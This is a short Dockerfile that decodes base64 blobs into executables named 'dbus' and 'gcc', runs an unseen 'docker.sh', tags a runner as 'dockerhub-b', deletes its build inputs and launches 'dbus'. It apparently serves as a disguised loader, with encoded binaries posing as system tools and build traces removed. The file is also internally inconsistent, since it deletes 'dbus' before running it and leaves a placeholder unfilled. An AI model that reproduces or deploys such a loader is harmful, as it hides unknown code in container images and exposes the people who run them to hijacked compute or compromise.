FROM kseniyakazlouskidi/gcc
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > dbus.log'

COPY dbus.64 .
COPY docker.sh .
COPY gcc.64 .

RUN bash -c 'base64 --decode dbus.64 > dbus'
RUN bash -c 'base64 --decode gcc.64 > gcc'
RUN chmod +x gcc
RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' dbus

RUN bash ./docker.sh
RUN rm --force --recursive dbus _REPO_NAME__.64 docker.sh gcc gcc.64

CMD dbus
